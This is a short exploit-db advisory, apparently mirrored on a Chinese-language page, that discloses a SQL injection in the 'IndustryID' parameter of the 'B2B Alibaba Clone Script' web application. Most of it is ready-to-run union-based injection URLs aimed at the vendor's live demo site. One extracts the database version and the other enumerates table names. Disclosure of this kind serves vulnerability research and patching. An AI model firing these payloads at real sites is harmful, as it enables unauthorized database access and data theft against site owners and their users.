B2B Alibaba Clone Script – ‘IndustryID’ SQL Injection

  • 作者: Ihsan Sencan
    日期: 2017-01-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/41140/
  • # # # # # 
    # Exploit Title: B2B Alibaba Clone Script - SQL Injection
    # Google Dork: N/A
    # Date: 20.01.2017
    # Vendor Homepage: https://www.clonescriptsoft.com/
    # Software Buy: https://www.clonescriptsoft.com/collections/b2b-alibaba-clone/products/alibaba-clone
    # Demo: http://alibaba.clonescriptsoft.com/
    # Version: N/A
    # Tested on: Win7 x64
    # # # # # 
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Mail : ihsan[beygir]ihsan[nokta]net
    # # # # #
    # SQL Injection/Exploit :
    # http://localhost/[PATH]/category.php?IndustryID=[SQL]
    # E.t.c....
    # # # # #
    
    
    SQL Injection
    http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,version()
    
    http://alibaba.clonescriptsoft.com/category.php?IndustryID=-1+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--